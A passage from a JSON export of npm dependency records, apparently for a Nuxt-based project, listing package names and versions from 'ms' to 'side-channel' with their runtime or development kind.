,"ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351036,"package_name":"ms@2.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351037,"package_name":"muggle-string@0.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351038,"package_name":"muggle-string@0.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351039,"package_name":"nanoid@3.3.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351040,"package_name":"nanoid@4.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351041,"package_name":"natural-compare@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351042,"package_name":"neo-async@2.6.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351043,"package_name":"nitropack@2.6.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351044,"package_name":"no-case@3.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351045,"package_name":"node-abort-controller@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351046,"package_name":"node-addon-api@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351047,"package_name":"node-domexception@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351048,"package_name":"node-emoji@1.11.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351049,"package_name":"node-fetch-native@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351050,"package_name":"node-fetch@2.6.12","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351051,"package_name":"node-fetch@3.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351052,"package_name":"node-forge@1.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351053,"package_name":"node-gyp-build@4.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351054,"package_name":"node-int64@0.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351055,"package_name":"node-releases@2.0.13","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351056,"package_name":"nopt@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351057,"package_name":"nopt@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351058,"package_name":"normalize-package-data@2.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351059,"package_name":"normalize-path@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351060,"package_name":"normalize-range@0.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351061,"package_name":"npm-run-path@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351062,"package_name":"npm-run-path@5.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351063,"package_name":"npmlog@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351064,"package_name":"nth-check@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351065,"package_name":"nuxi@3.9.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351066,"package_name":"nuxt-component-meta@0.5.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351067,"package_name":"nuxt-config-schema@0.4.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351138,"package_name":"nuxt-icon@0.3.3(vue@3.3.4)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351252,"package_name":"nuxt-vitest@0.10.5(@vitejs","ecosystem":"npm","requirements":"plugin-vue-jsx@3.0.2)(@vitejs","direct":false,"kind":"development","optional":false},{"id":13870351253,"package_name":"nypm@0.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351254,"package_name":"object-assign@4.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351255,"package_name":"object-inspect@1.12.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351256,"package_name":"object-is@1.1.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351257,"package_name":"object-keys@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351258,"package_name":"object.assign@4.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351259,"package_name":"object.fromentries@2.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351260,"package_name":"object.groupby@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351261,"package_name":"object.values@1.1.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351262,"package_name":"ofetch@1.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351263,"package_name":"ohash@1.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351264,"package_name":"on-finished@2.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351265,"package_name":"once@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351266,"package_name":"onetime@5.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351267,"package_name":"onetime@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351268,"package_name":"open@8.4.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351269,"package_name":"open@9.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351270,"package_name":"openapi-typescript@6.5.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351271,"package_name":"opener@1.5.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351272,"package_name":"optionator@0.9.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351273,"package_name":"p-limit@2.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351274,"package_name":"p-limit@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351275,"package_name":"p-limit@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351276,"package_name":"p-locate@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351277,"package_name":"p-locate@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351278,"package_name":"p-try@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351279,"package_name":"paneer@0.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351280,"package_name":"param-case@3.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351281,"package_name":"parent-module@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351282,"package_name":"parse-entities@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351283,"package_name":"parse-git-config@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351284,"package_name":"parse-json@5.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351285,"package_name":"parse-path@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351286,"package_name":"parse-url@8.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351287,"package_name":"parse5@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351288,"package_name":"parseurl@1.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351289,"package_name":"pascal-case@3.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351290,"package_name":"path-case@3.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351291,"package_name":"path-exists@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351292,"package_name":"path-is-absolute@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351293,"package_name":"path-key@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351294,"package_name":"path-key@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351295,"package_name":"path-parse@1.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351296,"package_name":"path-scurry@1.10.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351297,"package_name":"path-type@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351298,"package_name":"pathe@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351299,"package_name":"pathval@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351300,"package_name":"perfect-debounce@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351301,"package_name":"picocolors@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351302,"package_name":"picomatch@2.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351303,"package_name":"pify@2.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351304,"package_name":"pify@6.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351305,"package_name":"pinceau@0.18.9(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351306,"package_name":"pirates@4.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351307,"package_name":"pkg-types@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351308,"package_name":"playwright-core@1.38.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351309,"package_name":"pluralize@8.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351310,"package_name":"postcss-calc@9.0.1(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351311,"package_name":"postcss-colormin@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351312,"package_name":"postcss-convert-values@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351313,"package_name":"postcss-custom-properties@13.1.4(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351712,"package_name":"postcss-dark-theme-class@0.7.3(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351713,"package_name":"postcss-discard-comments@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351714,"package_name":"postcss-discard-duplicates@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351715,"package_name":"postcss-discard-empty@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351716,"package_name":"postcss-discard-overridden@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351717,"package_name":"postcss-import-resolver@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351718,"package_name":"postcss-import@15.1.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351719,"package_name":"postcss-loader@7.3.3(postcss@8.4.30)(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351720,"package_name":"postcss-merge-longhand@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351721,"package_name":"postcss-merge-rules@6.0.1(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351722,"package_name":"postcss-minify-font-values@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351723,"package_name":"postcss-minify-gradients@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351724,"package_name":"postcss-minify-params@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351725,"package_name":"postcss-minify-selectors@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351726,"package_name":"postcss-modules-extract-imports@3.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351727,"package_name":"postcss-modules-local-by-default@4.0.3(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351728,"package_name":"postcss-modules-scope@3.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351729,"package_name":"postcss-modules-values@4.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351730,"package_name":"postcss-nested@6.0.1(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351731,"package_name":"postcss-normalize-charset@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351732,"package_name":"postcss-normalize-display-values@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351733,"package_name":"postcss-normalize-positions@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351734,"package_name":"postcss-normalize-repeat-style@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351735,"package_name":"postcss-normalize-string@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351736,"package_name":"postcss-normalize-timing-functions@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351737,"package_name":"postcss-normalize-unicode@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351738,"package_name":"postcss-normalize-url@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351739,"package_name":"postcss-normalize-whitespace@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351740,"package_name":"postcss-ordered-values@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351741,"package_name":"postcss-reduce-initial@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351742,"package_name":"postcss-reduce-transforms@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351743,"package_name":"postcss-selector-parser@6.0.13","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351744,"package_name":"postcss-svgo@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351745,"package_name":"postcss-unique-selectors@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351746,"package_name":"postcss-url@10.1.3(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351747,"package_name":"postcss-value-parser@4.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351748,"package_name":"postcss@8.4.30","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351749,"package_name":"prelude-ls@1.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351750,"package_name":"pretty-bytes@6.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351751,"package_name":"pretty-format@29.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351752,"package_name":"pretty-time@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351753,"package_name":"process-nextick-args@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351754,"package_name":"promise@7.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351755,"package_name":"property-information@6.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351756,"package_name":"proto-list@1.2.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351757,"package_name":"protocols@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351758,"package_name":"prr@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351759,"package_name":"pug-attrs@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351760,"package_name":"pug-code-gen@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351761,"package_name":"pug-error@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351762,"package_name":"pug-filters@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351763,"package_name":"pug-lexer@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351764,"package_name":"pug-linker@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351765,"package_name":"pug-load@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351766,"package_name":"pug-parser@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351767,"package_name":"pug-plain-loader@1.1.0(pug@3.0.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351975,"package_name":"pug-runtime@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351978,"package_name":"pug-strip-comments@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351981,"package_name":"pug-walk@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351983,"package_name":"pug@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351986,"package_name":"punycode@2.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351989,"package_name":"queue-microtask@1.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351992,"package_name":"queue-tick@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351994,"package_name":"quill-delta@5.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870352087,"package_name":"radix3@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870352090,"package_name":"randombytes@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870352094,"package_name":"range-parser@1.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870352096,"package_name":"rc9@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870352099,"package_name":"react-is@18.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352102,"package_name":"read-cache@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870352105,"package_name":"read-pkg-up@7.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352109,"package_name":"read-pkg@5.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352111,"package_name":"readable-stream@2.3.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870352114,"package_name":"readable-stream@3.6.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870352117,"package_name":"readdir-glob@1.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870352119,"package_name":"readdirp@3.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870352122,"package_name":"recast@0.22.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352123,"package_name":"redis-errors@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870352124,"package_name":"redis-parser@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870352125,"package_name":"regexp-tree@0.1.27","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352126,"package_name":"regexp.prototype.flags@1.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352127,"package_name":"regexpp@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352128,"package_name":"rehype-external-links@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352129,"package_name":"rehype-raw@6.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352130,"package_name":"rehype-slug@5.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352131,"package_name":"rehype-sort-attribute-values@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352132,"package_name":"rehype-sort-attributes@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352133,"package_name":"remark-emoji@3.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352727,"package_name":"remark-gfm@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352730,"package_name":"remark-mdc@1.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352734,"package_name":"remark-parse@10.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352737,"package_name":"remark-rehype@10.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870352742,"package_name":"remark-squeeze-paragraphs@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353104,"package_name":"require-directory@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353107,"package_name":"require-from-string@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353109,"package_name":"resolve-from@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353111,"package_name":"resolve-from@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353113,"package_name":"resolve-pkg-maps@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353115,"package_name":"resolve@1.22.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353118,"package_name":"reusify@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353120,"package_name":"rimraf@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353122,"package_name":"rimraf@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353124,"package_name":"rollup-plugin-dts@5.3.1(rollup@3.29.1)(typescript@5.2.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353229,"package_name":"rollup-plugin-dts@6.0.0(rollup@3.29.1)(typescript@5.2.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353230,"package_name":"rollup-plugin-visualizer@5.9.2(rollup@3.29.1)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353231,"package_name":"rollup@3.29.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353232,"package_name":"run-applescript@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353233,"package_name":"run-con@1.2.12","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353234,"package_name":"run-parallel@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353235,"package_name":"rxjs@7.8.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353236,"package_name":"sade@1.8.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353237,"package_name":"safe-array-concat@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353238,"package_name":"safe-buffer@5.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353239,"package_name":"safe-buffer@5.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353240,"package_name":"safe-regex-test@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353241,"package_name":"safe-regex@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353242,"package_name":"safer-buffer@2.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353243,"package_name":"sass@1.64.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353244,"package_name":"schema-utils@3.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353245,"package_name":"schema-utils@4.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353246,"package_name":"scule@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353247,"package_name":"semver@5.7.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353248,"package_name":"semver@6.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353249,"package_name":"semver@7.5.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353250,"package_name":"send@0.18.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353251,"package_name":"sentence-case@3.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353252,"package_name":"serialize-javascript@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353253,"package_name":"serve-placeholder@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353254,"package_name":"serve-static@1.15.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353255,"package_name":"set-blocking@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353256,"package_name":"setprototypeof@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353257,"package_name":"shebang-command@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353258,"package_name":"shebang-regex@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353259,"package_name":"shiki-es@0.14.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353260,"package_name":"side-channel@1